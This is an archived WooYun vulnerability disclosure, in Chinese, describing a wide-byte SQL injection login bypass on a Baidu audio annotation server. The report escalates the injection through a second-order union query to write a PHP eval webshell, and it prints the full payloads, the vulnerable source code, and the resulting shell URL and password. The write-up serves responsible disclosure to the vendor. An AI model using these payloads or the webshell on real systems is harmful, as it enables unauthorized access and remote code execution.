当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(223) 关注此漏洞

缺陷编号: WooYun-2015-157024

漏洞标题: 百度某系统SQL注入到Getshell

相关厂商: 百度

漏洞作者: 玉林嘎认证白帽子

提交时间: 2015-11-30 13:29

公开时间: 2016-01-14 18:46

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

52人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

我又来了

详细说明:

http://115.239.210.62:8080 百度一个关于音频的系统



页面gbk猜测存在宽字节注入



1.png





%df' or 1# bypass登录



2.png







3.png





进入后台就想shell一波 但是完全没有上传的地方

刚好页面有些有warnming 报出路径 还想利用之前方法写波shell



4.png





但是写shell的into outfile '路径' 单引号被转义了 是不行的



后台存在很多注入 尝试读文件试试



6.png





是可以读文件的 那么下面的思路就是审计源码 寻找shell方法



code 区域
/home/audio/label/apache/htdocs/new_user_post.php


/home/audio/label/apache/htdocs/new_user.php


/home/audio/label/apache/htdocs/label/index.php


/home/audio/label/apache/htdocs/register.php


/home/audio/label/apache/htdocs/user_management.php


/home/audio/label/apache/htdocs/user_modify.php


/home/audio/label/apache/htdocs/user_work.php


/home/audio/label/apache/htdocs/user_work_show.php


/home/audio/label/apache/htdocs/session_destroy.php


/home/audio/label/apache/htdocs/user_delete.php


/home/audio/label/apache/htdocs/member_login.php


/home/audio/label/apache/htdocs/inc.php


/home/audio/label/apache/htdocs/user_modify_post.php





对上面文件进行读取 简单的增删改查 没有其他多余的操作



注入却无法引入单引号 根据经验 二次注入是可以引入'

接下来寻找二次注入 且注入位置位于 select操作 才可尝试写文件



突破点在下面文件

code 区域
/home/audio/label/apache/htdocs/user_work.php


/home/audio/label/apache/htdocs/user_work_show.php





code 区域
<?php


	require('inc.php');


	if (isset($_SESSION['wav']) && is_file($_SESSION['wav'])   && !unlink($_SESSION['wav']))


	{


        	echo "Warning:deleting".$_SESSION['wav']."failed";


	}


	if (isset($_SESSION['pic']) && is_file($_SESSION['pic'])   && !unlink($_SESSION['pic']))


	{


        	echo "Warning:deleting".$_SESSION['pic']."failed";


	}


	if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))


	{


        	echo "Warning:deleting".$_SESSION['adpcm']."failed";


	}


	if(isset($_GET['jump']))


        {


                if($_GET['jump']==1)


                {


                        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);


                }


                else if($_GET['jump']==2)


                {


                        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);


                }


        }


	if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")


        {


                echo "请您重新<a href='index.php'>登录</a></br>";


                header("refresh:2; URL='index.php'");


                exit;


        }


	$link = getAN_DBLink();


    if($_SESSION['auth']==2)


{


    $sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";


}


else if($_SESSION['auth']==1)


{


    $sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";


}


else if($_SESSION['auth']==0)


{


    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";


}


else


{


    echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";


    header("refresh:2; URL='index.php'");


    exit;


}


$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";


write_log($con);        


$result=mysql_query($sql) or die("数据库查询失败");


$num=mysql_num_rows($result);


if($_SESSION['work']=="annotate")


    $chn_type="标注"; 


else if($_SESSION['work']=="check")


    $chn_type="检查"; 


else


	$chn_type="精选"; 


?>





code 区域
else if($_SESSION['auth']==0)


{


    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";


}



$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数

$_SESSION 是在登录赋值的 那么去看下登录文件



code 区域
/home/audio/label/apache/htdocs/member_login.php





code 区域
<?php


require_once ('inc.php');


if(empty($_POST['name'])){


	echo "用户名不能为空,自动返回登录界面...</br></br>";


	echo "点击返回<a href='index.php'>登录界面</a>";


    	header("refresh:2; URL='index.php'");


	//echo "用户名不能为空,自动返回登录界面...</br></br>";


	//echo "点击返回<a href='index.php'>登录界面</a>";


 //        header('Location:http://10.210.26.11:8080/index.php');


	exit;	


}


else if(empty($_POST['password'])){


	echo "密码不能为空,自动返回登录界面...</br></br>";


	echo "点击返回<a href='index.php'>登录界面</a>";


	header("refresh:2; URL='index.php'");


	exit;	


}





else if(empty($_POST['yzm'])){


    echo "验证码不能为空,自动返回登录界面...</br></br>";


    echo "点击返回<a href='index.php'>登录界面</a>";


	header("refresh:2; URL='index.php'");


	exit;        


}


$link = getAN_DBLink();


$name = mysql_real_escape_string($_POST['name'], $link);


$pw   = mysql_real_escape_string($_POST['password'], $link);


$code =$_POST['yzm'];


if( $code != $_SESSION["Checknum"])


{


    echo "验证码错误,自动返回登录界面...</br></br>";


    echo "点击返回<a href='index.php'>登录界面</a>";


    mysql_close();


   header("refresh:2; URL='index.php'");


    exit;


}


$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";


$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";


write_log($con); 


$result=mysql_query($sql, $link) or die("数据库查询失败");


$num=mysql_num_rows($result);


if($num==0)


{


    echo "账户不存在,自动返回登录界面...</br></br>";


    echo "点击返回<a href='index.php'>登录界面</a>";


    mysql_close();


    header("refresh:2; URL='index.php'");


    exit;


}


$rs=mysql_fetch_object($result);


//while($rs=mysql_fetch_object($result))


if ($rs != false)


{


    $_SESSION['pass']     ="ok";


    $_SESSION['num']      =0;


    $_SESSION['name']     =$name;


    $_SESSION['id']       =$rs->id;


    $_SESSION['auth']     =$rs->authority;


    $_SESSION['rname']    =$rs->real_name;


    $_SESSION['gender']   =$rs->Gender;


    $_SESSION['mobile']   =$rs->Mobile;


    $_SESSION['ikey']     =$rs->Ikey;


    $_SESSION['mail']     =$rs->Mail;


    $_SESSION['type']     =$_POST['type'];


    $time                 =date('U');


    $ip                   ="";


    if(isset($_SERVER['HTTP_CLIENT_IP']))


    {


        $ip=$_SERVER['HTTP_CLIENT_IP'];


    }


    else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))


    {


        $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];


    }


    else{


        $ip=$_SERVER['REMOTE_ADDR'];


    }





code 区域
$_SESSION['auth']     =$rs->authority;





$rs又是根据

code 区域
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"



查询出来的



那么登录的时候利用联合查询直接控制authority 即可



name只需传入下面代码即可

code 区域
test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#





code 区域
0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027


0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'





通过联合查询 不仅bypass进入系统 而且在第二个字段控制为 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'



进入之后访问 user_work.php 文件即可



最后生成shell http://115.239.210.62:8080/label/test.php 密码:s



QQ图片20151130132632.png





内网 未深入

漏洞证明:

http://115.239.210.62:8080 百度一个关于音频的系统



页面gbk猜测存在宽字节注入



1.png





%df' or 1# bypass登录



2.png







3.png





进入后台就想shell一波 但是完全没有上传的地方

刚好页面有些有warnming 报出路径 还想利用之前方法写波shell



4.png





但是写shell的into outfile '路径' 单引号被转义了 是不行的



后台存在很多注入 尝试读文件试试



6.png





是可以读文件的 那么下面的思路就是审计源码 寻找shell方法



code 区域
/home/audio/label/apache/htdocs/new_user_post.php


/home/audio/label/apache/htdocs/new_user.php


/home/audio/label/apache/htdocs/label/index.php


/home/audio/label/apache/htdocs/register.php


/home/audio/label/apache/htdocs/user_management.php


/home/audio/label/apache/htdocs/user_modify.php


/home/audio/label/apache/htdocs/user_work.php


/home/audio/label/apache/htdocs/user_work_show.php


/home/audio/label/apache/htdocs/session_destroy.php


/home/audio/label/apache/htdocs/user_delete.php


/home/audio/label/apache/htdocs/member_login.php


/home/audio/label/apache/htdocs/inc.php


/home/audio/label/apache/htdocs/user_modify_post.php





对上面文件进行读取 简单的增删改查 没有其他多余的操作



注入却无法引入单引号 根据经验 二次注入是可以引入'

接下来寻找二次注入 且注入位置位于 select操作 才可尝试写文件



突破点在下面文件

code 区域
/home/audio/label/apache/htdocs/user_work.php


/home/audio/label/apache/htdocs/user_work_show.php





code 区域
<?php


	require('inc.php');


	if (isset($_SESSION['wav']) && is_file($_SESSION['wav'])   && !unlink($_SESSION['wav']))


	{


        	echo "Warning:deleting".$_SESSION['wav']."failed";


	}


	if (isset($_SESSION['pic']) && is_file($_SESSION['pic'])   && !unlink($_SESSION['pic']))


	{


        	echo "Warning:deleting".$_SESSION['pic']."failed";


	}


	if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))


	{


        	echo "Warning:deleting".$_SESSION['adpcm']."failed";


	}


	if(isset($_GET['jump']))


        {


                if($_GET['jump']==1)


                {


                        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);


                }


                else if($_GET['jump']==2)


                {


                        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);


                }


        }


	if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")


        {


                echo "请您重新<a href='index.php'>登录</a></br>";


                header("refresh:2; URL='index.php'");


                exit;


        }


	$link = getAN_DBLink();


    if($_SESSION['auth']==2)


{


    $sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";


}


else if($_SESSION['auth']==1)


{


    $sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";


}


else if($_SESSION['auth']==0)


{


    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";


}


else


{


    echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";


    header("refresh:2; URL='index.php'");


    exit;


}


$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";


write_log($con);        


$result=mysql_query($sql) or die("数据库查询失败");


$num=mysql_num_rows($result);


if($_SESSION['work']=="annotate")


    $chn_type="标注"; 


else if($_SESSION['work']=="check")


    $chn_type="检查"; 


else


	$chn_type="精选"; 


?>





code 区域
else if($_SESSION['auth']==0)


{


    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";


}



$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数

$_SESSION 是在登录赋值的 那么去看下登录文件



code 区域
/home/audio/label/apache/htdocs/member_login.php





code 区域
<?php


require_once ('inc.php');


if(empty($_POST['name'])){


	echo "用户名不能为空,自动返回登录界面...</br></br>";


	echo "点击返回<a href='index.php'>登录界面</a>";


    	header("refresh:2; URL='index.php'");


	//echo "用户名不能为空,自动返回登录界面...</br></br>";


	//echo "点击返回<a href='index.php'>登录界面</a>";


 //        header('Location:http://10.210.26.11:8080/index.php');


	exit;	


}


else if(empty($_POST['password'])){


	echo "密码不能为空,自动返回登录界面...</br></br>";


	echo "点击返回<a href='index.php'>登录界面</a>";


	header("refresh:2; URL='index.php'");


	exit;	


}





else if(empty($_POST['yzm'])){


    echo "验证码不能为空,自动返回登录界面...</br></br>";


    echo "点击返回<a href='index.php'>登录界面</a>";


	header("refresh:2; URL='index.php'");


	exit;        


}


$link = getAN_DBLink();


$name = mysql_real_escape_string($_POST['name'], $link);


$pw   = mysql_real_escape_string($_POST['password'], $link);


$code =$_POST['yzm'];


if( $code != $_SESSION["Checknum"])


{


    echo "验证码错误,自动返回登录界面...</br></br>";


    echo "点击返回<a href='index.php'>登录界面</a>";


    mysql_close();


   header("refresh:2; URL='index.php'");


    exit;


}


$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";


$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";


write_log($con); 


$result=mysql_query($sql, $link) or die("数据库查询失败");


$num=mysql_num_rows($result);


if($num==0)


{


    echo "账户不存在,自动返回登录界面...</br></br>";


    echo "点击返回<a href='index.php'>登录界面</a>";


    mysql_close();


    header("refresh:2; URL='index.php'");


    exit;


}


$rs=mysql_fetch_object($result);


//while($rs=mysql_fetch_object($result))


if ($rs != false)


{


    $_SESSION['pass']     ="ok";


    $_SESSION['num']      =0;


    $_SESSION['name']     =$name;


    $_SESSION['id']       =$rs->id;


    $_SESSION['auth']     =$rs->authority;


    $_SESSION['rname']    =$rs->real_name;


    $_SESSION['gender']   =$rs->Gender;


    $_SESSION['mobile']   =$rs->Mobile;


    $_SESSION['ikey']     =$rs->Ikey;


    $_SESSION['mail']     =$rs->Mail;


    $_SESSION['type']     =$_POST['type'];


    $time                 =date('U');


    $ip                   ="";


    if(isset($_SERVER['HTTP_CLIENT_IP']))


    {


        $ip=$_SERVER['HTTP_CLIENT_IP'];


    }


    else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))


    {


        $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];


    }


    else{


        $ip=$_SERVER['REMOTE_ADDR'];


    }





code 区域
$_SESSION['auth']     =$rs->authority;





$rs又是根据

code 区域
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"



查询出来的



那么登录的时候利用联合查询直接控制authority 即可



name只需传入下面代码即可

code 区域
test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#





code 区域
0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027


0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'





通过联合查询 不仅bypass进入系统 而且在第二个字段控制为 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'



进入之后访问 user_work.php 文件即可



最后生成shell http://115.239.210.62:8080/label/test.php 密码:s



QQ图片20151130132632.png





内网 未深入

修复方案:

登录之后全是注入哎。

版权声明:转载请注明来源 玉林嘎@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-30 18:45

厂商回复:

感谢关注百度安全!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2015-11-30 13:31 | king7 ( 普通白帽子 | Rank:1807 漏洞数:248 | 3P is the life I want to live.)
    0

    表哥,你有点过分了

    1# 回复此人
  2. 2015-11-30 13:32 | 我的邻居王婆婆 ( 普通白帽子 | Rank:3006 漏洞数:508 | 刚发现个好洞网站就挂了)
    0

    百度SQL注入两连击啊

    2# 回复此人
  3. 2015-11-30 13:34 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:933 漏洞数:107 )
    0

    感谢wooyun

    3# 回复此人
  4. 2015-11-30 13:37 | whynot ( 普通白帽子 | Rank:670 漏洞数:134 | 为你解冻冰河 为你放弃世界有何不可)
    0

    闪电6666

    4# 回复此人
  5. 2015-11-30 13:38 | _Thorns ( 普通白帽子 | Rank:1712 漏洞数:261 )
    0

    百度要过来打你了!

    5# 回复此人
  6. 2015-11-30 13:40 | 我的邻居王婆婆 ( 普通白帽子 | Rank:3006 漏洞数:508 | 刚发现个好洞网站就挂了)
    0

    这是什么站啊,居然闪了

    6# 回复此人
  7. 2015-11-30 13:43 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    好赞,变废为宝

    7# 回复此人
  8. 2015-11-30 14:11 | 二愣子 ( 普通白帽子 | Rank:205 漏洞数:45 | 毛毛你是个好姑娘)
    0

    啪嚓~~~

    8# 回复此人
  9. 2015-11-30 14:16 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    0

    有雷!

    9# 回复此人
  10. 2015-11-30 14:29 | answer 认证白帽子 ( 普通白帽子 | Rank:453 漏洞数:54 | 答案)
    0

    后排膜拜

    10# 回复此人
  11. 2015-11-30 14:39 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)
    0

    闪电必关

    11# 回复此人
  12. 2015-11-30 15:28 | 40huo ( 实习白帽子 | Rank:49 漏洞数:17 | 一代枪神 http://www.40huo.cn)
    0

    这个屌

    12# 回复此人
  13. 2015-11-30 16:08 | 镱鍚 ( 普通白帽子 | Rank:184 漏洞数:30 | 。。!)
    0

    嘎子哥真屌。。

    13# 回复此人
  14. 2015-11-30 16:26 | SH0X8001 ( 路人 | Rank:25 漏洞数:6 | 你猜)
    0

    好屌

    14# 回复此人
  15. 2015-11-30 16:38 | Cheery ( 路人 | Rank:26 漏洞数:5 | 0.0)
    0

    恭喜啊 打雷了

    15# 回复此人
  16. 2015-11-30 19:10 | Can ( 普通白帽子 | Rank:115 漏洞数:33 | 我是水一样的男子,因为党说我是流动人口。)
    0

    前排出售百度shell

    16# 回复此人
  17. 2015-11-30 19:31 | ShAdow丶 ( 实习白帽子 | Rank:93 漏洞数:17 )
    0

    看到雷了 。

    17# 回复此人
  18. 2015-11-30 19:36 | onpu ( 普通白帽子 | Rank:354 漏洞数:62 | 不轻诺 故我不负人 不信诺 故人不负我)
    0

    打雷要下雨雷欧

    18# 回复此人
  19. 2015-11-30 23:56 | 孤梦° ( 普通白帽子 | Rank:128 漏洞数:48 )
    0

    闪电了 666

    19# 回复此人
  20. 2015-12-10 18:59 | gainover 认证白帽子 ( 普通白帽子 | Rank:1805 漏洞数:97 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
    0

    赞!

    20# 回复此人
  21. 2015-12-10 19:56 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1878 漏洞数:154 | 不要患得患失,我羡慕你,但是我还是选择做...)
    0

    请收下我的膝盖!

    21# 回复此人
  22. 2015-12-10 20:00 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:933 漏洞数:107 )
    0

    @小胖子 @gainover - -

    22# 回复此人
  23. 2015-12-10 20:30 | gainover 认证白帽子 ( 普通白帽子 | Rank:1805 漏洞数:97 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
    0

    @玉林嘎 你的rank值好土豪!!

    23# 回复此人
  24. 2015-12-20 18:51 | _Thorns ( 普通白帽子 | Rank:1712 漏洞数:261 )
    0

    又盼来一个,哈哈哈。

    24# 回复此人
  25. 2015-12-20 19:42 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)
    0

    66666666

    25# 回复此人
  26. 2016-01-14 19:10 | 金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)
    0

    吃惊

    26# 回复此人
  27. 2016-01-14 20:57 | JGHOOluwa ( 普通白帽子 | Rank:556 漏洞数:88 | 就是来看看大牛们如何超神的^-^)
    0

    666

    27# 回复此人
  28. 2016-01-14 21:13 | lanyan ( 路人 | Rank:1 漏洞数:1 | qq 1614591916 求搞基 加我时记得备注woo...)
    0

    这getshell姿势 666

    28# 回复此人
  29. 2016-01-14 23:18 | Sai、 ( 路人 | Rank:14 漏洞数:4 | for fun……)
    0

    这个shell拿的6,赞

    29# 回复此人
  30. 2016-01-15 09:40 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)
    0

    这个注入 精彩666

    30# 回复此人
  31. 2016-01-15 13:35 | D&G ( 普通白帽子 | Rank:566 漏洞数:113 | going)
    0

    二次注入写shell啊。6666

    31# 回复此人

登录后才能发表评论,请先 登录